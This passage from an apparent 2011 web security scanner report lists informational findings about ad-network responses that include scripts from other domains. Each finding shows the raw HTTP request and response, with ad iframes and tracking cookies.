P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:52:21 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Sun, 02 Oct 2011 23:52:21 GMT
Content-Length: 3209

<IFRAME SRC="http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15;sz=728x90;click=http://ib.adnxs.com/click?znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhO
...[SNIP]...
2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0

HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6010.456584.XAXIS.COM/B5752701.15;abr=!ie;sz=728x90;click=http://ib.adnxs.com/click?znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEDAQUCAQQAAAAAHyfnFwAAAAA./cnd=!sAQDJgiylwcQsrMkGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426?">
</SCRIPT>
...[SNIP]...
20.23. http://ib.adnxs.com/if  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /if?enc=VA8_znuE3j81XrpJDALbPwAAAMDMzPQ_idS0i2nG4T9os-pztRXkP1FauSSUjOIucEeI8W8QIlnW-ohOAAAAAE1ECABlAQAAAgQAAAIAAAB-9gkAPWQAAAAAAABVU0QAVVNEACwB-gD8AdsEKA8BAgUCAQQAAAAA9CQ0EAAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLuQ1CQQwFwPe5tNJvg9SS97K9AS3Qw54xZdAVXUAvRIjJZ8cG4Npzjb2oEHtTSs0LWddJNc4UuK9qJg6H-_P73nH8j5bbHDEE4pEWLROmlWch7wurhaJDssMJ0JvDGdunOlyAxws_JgE413MAAAA%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+27755%2C+1317599958%29%3Buf%28%27c%27%2C+149177%2C+1317599958%29%3Buf%28%27r%27%2C+652926%2C+1317599958%29%3Bppv%2817492%2C+%273378417238380468817%27%2C+1317599958%2C+1317859158%2C+149177%2C+25661%2C+0%29%3Bppv%2817492%2C+%273378417238380468817%27%2C+1317599958%2C+1317859158%2C+149177%2C+25661%2C+0%29%3B&cnd=!Dh5vzwi5jQkQ_uwnGAAgvcgBMAE4_ANAAEiCCFAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAqgBA7ABALkBkJ0uALYV5D_BAZCdLgC2FeQ_yQFmZmZmZmbyP9kBAAAAAAAA8D_gAQA.&ccd=!NwWFKgi5jQkQ_uwnGL3IASAA&referrer=http://www.goal.com&media_subtypes=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:59:23 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Sun, 02 Oct 2011 23:59:23 GMT
Content-Length: 627

<script language="javascript" src="http://www.inadcoads.com/script.ashx?pczid=269ccbc6-3ea2-4863-8eb1-67f59498f8ce&click_url=http://ib.adnxs.com/click?VA8_znuE3j81XrpJDALbPwAAAMDMzPQ_idS0i2nG4T9os-pztRXkP1FauSSUjOIucEeI8W8QIlnW-ohOAAAAAE1ECABlAQAAAgQAAAIAAAB-9gkAPWQAAAAAAABVU0QAVVNEACwB-gD8AdsEKA8DAQUCAQQAAAAA9SRHEAAAAAA./cnd=!NwWFKgi5jQkQ_uwnGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ1CQQwFwPe5tNJvg9SS97K9AS3Qw54xZdAVXUAvRIjJZ8cG4Npzjb2oEHtTSs0LWddJNc4UuK9qJg6H-_P73nH8j5bbHDEE4pEWLROmlWch7wurhaJDssMJ0JvDGdunOlyAxws_JgE413MAAAA%3D%26dst%3D">
</script>
20.24. http://ib.adnxs.com/if  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /if?enc=VgQNJ3Vfzj_hehSuR-HKPwAAAMDMzPQ_gL81A54syz82VmKelbTOPwrjFbNuftsOcEeI8W8QIllB_IhOAAAAAE1ECABlAQAAAgQAAAIAAAB-9gkAPWQAAAAAAABVU0QAVVNEACwB-gD8AdsEjAgBAgUCAQQAAAAA4CIHNQAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLsQ0CMQwF0H8coEi3Bq2lxE7iuKBgAXYgOKkZg60Yg2Uo0L3-bVgAXKTVpxsP4qSdsotSlyZklrVr9tEKBxzu799tw7qPXvpwYaboedJsNdIswygli9rY1GsJOAJ6DThh-T4CzsDrgz_96owTcwAAAA%3D%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+27755%2C+1317600321%29%3Buf%28%27c%27%2C+125959%2C+1317600321%29%3Buf%28%27r%27%2C+652926%2C+1317600321%29%3Bppv%2817492%2C+%271070588350346683146%27%2C+1317600321%2C+1317859521%2C+125959%2C+25661%2C+0%29%3Bppv%2817492%2C+%271070588350346683146%27%2C+1317600321%2C+1317859521%2C+125959%2C+25661%2C+0%29%3B&cnd=!1h8O6giH2AcQ_uwnGAAgvcgBMAE4_ANAAEiCCFAAWABgeGgAcAJ4DIABAogBDJABAZgBAaABAqgBA7ABALkBDD4-AZa0zj_BAQw-PgGWtM4_yQHNzMzMzMz0P9kBAAAAAAAA8D_gAQA.&ccd=!TgVpKwiH2AcQ_uwnGL3IASAA&referrer=http://www.goal.com&media_subtypes=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OUR SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Mon, 20-Sep-2021 00:05:22 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Mon, 03 Oct 2011 00:05:22 GMT
Content-Length: 633

<script language="javascript" src="http://www.inadcoads.com/script.ashx?pczid=269ccbc6-3ea2-4863-8eb1-67f59498f8ce&click_url=http://ib.adnxs.com/click?VgQNJ3Vfzj_hehSuR-HKPwAAAMDMzPQ_gL81A54syz82VmKelbTOPwrjFbNuftsOcEeI8W8QIllB_IhOAAAAAE1ECABlAQAAAgQAAAIAAAB-9gkAPWQAAAAAAABVU0QAVVNEACwB-gD8AdsEjAgDAQUCAQQAAAAA4SIaNQAAAAA./cnd=!TgVpKwiH2AcQ_uwnGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0H8coEi3Bq2lxE7iuKBgAXYgOKkZg60Yg2Uo0L3-bVgAXKTVpxsP4qSdsotSlyZklrVr9tEKBxzu799tw7qPXvpwYaboedJsNdIswygli9rY1GsJOAJ6DThh-T4CzsDrgz_96owTcwAAAA%3D%3D%26dst%3D">
</script>
20.25. http://o-va1.wtp101.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va1.wtp101.com
Path:   /imp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /imp?bc=CgVvcGVueBIkNWI0YWUwODktMDVhYi00NWQ4LWJmMDMtZDcwNmM0YzJkZjM0IW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscfv78GHyKVns_3jj9bHHoO7pP3Bj44Sw HTTP/1.1
Host: o-va1.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; opvc=!3919,CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M#,1317600698; pvmap=!3919,1317600698,ova!3919,1317600201,ova3; synclock=full; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:13:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=d22326de-7542-4e09-8630-c6943c0e5308; path=/; expires=Wed, 02 Oct 2013 00:13:31 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkNWI0YWUwODktMDVhYi00NWQ4LWJmMDMtZDcwNmM0YzJkZjM0IW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M#,1317600811; path=/; expires=Wed, 02 Oct 2013 00:13:31 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317600811,ova!3919,1317600797,ova!3919,1317600796,ova!3919,1317600795,ova!3919,1317600791,ova!3919,1317600784,ova!3919,1317600201,ova3d0469776442fe78d28ed2840; path=/; expires=Wed, 02 Oct 2013 00:13:31 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va1.wtp101.com/click?bc=CgVvcGVueBIkNWI0YW
...[SNIP]...
NmPgBADpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1239357571?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<script language='JavaScript1.1' SRC="http://fw.adsafeprotected.com/rjss/dc/10625/165712/adj/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://o-va1.wtp101.com/click?bc=CgVvcGVueBIkNWI0YWUwODktMDVhYi00NWQ4LWJmMDMtZDcwNmM0YzJkZjM0IW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1239357571?">
</SCRIPT>
...[SNIP]...
20.26. http://o-va1.wtp101.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va1.wtp101.com
Path:   /imp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /imp?bc=CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscfG0LluyTuhmTAJwT3iYRqhyPr7vh5Cg HTTP/1.1
Host: o-va1.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; pvmap=!3919,1317600201,ova3; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:12:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M#,1317600778; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317600778,ova!3919,1317600740,ova!3919,1317600698,ova!3919,1317600201,ova3; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va1.wtp101.com/click?bc=CgVvcGVueBIkMjg5Mj
...[SNIP]...
NmPgBADpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1089883246?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<script language='JavaScript1.1' SRC="http://fw.adsafeprotected.com/rjss/dc/10625/165712/adj/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://o-va1.wtp101.com/click?bc=CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1089883246?">
</SCRIPT>
...[SNIP]...
20.27. http://o-va3.wtp101.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va3.wtp101.com
Path:   /imp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg HTTP/1.1
Host: o-va3.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; s=!1762!3105!2445!1731; synclock=t

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:03:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317600201,ova3!3919,1317600201,ova3; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

